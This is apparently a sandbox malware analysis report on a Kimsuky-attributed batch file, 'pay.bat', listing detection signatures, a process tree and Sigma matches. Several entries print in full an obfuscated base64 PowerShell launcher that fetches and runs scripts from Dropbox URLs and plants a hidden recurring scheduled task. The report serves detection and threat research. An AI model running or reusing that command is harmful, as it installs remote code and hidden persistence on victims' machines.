Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pay.bat

Overview

General Information

Sample name:pay.bat
Analysis ID:1563601
MD5:b262ac518c0114f414aaedbb4ef7c728
SHA1:fd02470c6cc4ceb5fad3589d02e5148a8c738b83
SHA256:8e0eb0d36bfd4e28ec6a10acccf899740df7048451229b84715e475e3c91347b
Tags:batuser-1ZRR4H
Infos:

Detection

Kimsuky
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Kimsuky
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 2020 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pay.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2124 cmdline: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21jc2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3Jsa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW02czl5Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD MD5: 04029E121A0CFA5991749937DD22A1D9)
  • powershell.exe (PID: 5480 cmdline: PowerShell.exe -WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps1\"; & $abc;}" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Kimsuky
  • Kimsuki
  • Kimsuky
https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\system_first.ps1JoeSecurity_Kimsuky_9Yara detected KimsukyJoe Security
    C:\Users\user\AppData\Roaming\temp.ps1JoeSecurity_Kimsuky_9Yara detected KimsukyJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000002.00000002.1821493344.000002C3DAF45000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Kimsuky_9Yara detected KimsukyJoe Security
        00000003.00000002.1836552794.0000019FBB236000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Kimsuky_9Yara detected KimsukyJoe Security
          00000003.00000002.1836552794.0000019FBB23A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Kimsuky_9Yara detected KimsukyJoe Security
            00000002.00000002.1821493344.000002C3DAF78000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Kimsuky_9Yara detected KimsukyJoe Security
              00000002.00000002.1821493344.000002C3DAF29000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Kimsuky_9Yara detected KimsukyJoe Security
                Click to see the 5 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Base64 Encoded PowerShell Command Detected
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21jc2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3Jsa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW02czl5Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD, CommandLine: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR
                Sigma detected: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
                Source: Process startedAuthor: Timur Zinniatullin, oscd.community: Data: Command: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21jc2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3Jsa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW02czl5Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD, CommandLine: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR
                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21jc2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3Jsa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW02czl5Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD, CommandLine: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR
                Sigma detected: Suspicious PowerShell Parameter Substring
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJpZ2dlciAkdHJpZ2dlciAtU2V0dGluZ3MgJHNldHRpbmdzOyAgJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAic3lzdGVtX2ZpcnN0LnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9nN21jc2hreDNxbW81bXZ5dGYyY3Qvc2FudGEyLXgudHh0P3Jsa2V5PTVuYmJxZWdjNWE3N3I3NmhpeW02czl5Mmgmc3Q9NzI3Y3MxbXgmZGw9MCIgLU91dEZpbGUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtSXRlbSAtUGF0aCAkYWFhIC1Gb3JjZTs=');$U9zBwFeD = [System.Text.Encoding]::UTF8.GetString($cmkGnaBV);&('{5}{0}{2}{1}{3}{4}{6}'-f 'oke','xp','-E','res','sio','Inv','n') $U9zBwFeD, CommandLine: powershell /W 1 -ep bypass -w hidden -command $cmkGnaBV=[Convert]::FromBase64String('JHBwcCA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAiY2hyb21lLnBzMSI7ICRzdHIgPSAnJGFhYSA9IEpvaW4tUGF0aCAoJGVudjpBcHBEYXRhKSAidGVtcC5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250ZW50LmNvbS9zY2wvZmkvZGt1YW1scmxzcmJ5Z3NvMXN3bjhwL3NhbnRhMi1mLnR4dD9ybGtleT1yOGZlMHZpaWVyMW13djlhems1YXd5NXM5JnN0PXl2cXFmZGZ5JmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0ciB8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVVEY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24gLUV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQXJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5vbkludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgXCJjaHJvbWUucHMxXCI7ICYgJGFiYzt9Iic7ICR0cmlnZ2VyID0gTmV3LVNjaGVkdWxlZFRhc2tUcmlnZ2VyIC1PbmNlIC1BdCAoR2V0LURhdGUpLkFkZE1pbnV0ZXMoNSkgLVJlcGV0aXRpb25JbnRlcnZhbCAoTmV3LVRpbWVTcGFuIC1NaW51dGVzIDMwKTsgJHNldHRpbmdzID0gTmV3LVNjaGVkdWxlZFRhc2tTZXR0aW5nc1NldCAtSGlkZGVuOyBSZWdpc3Rlci1TY2hlZHVsZWRUYXNrIC1UYXNrTmFtZSAiQ2hyb21lVXBkYXRlVGFza01hY2hpbmUiIC1BY3Rpb24gJGFjdGlvbiAtVHJp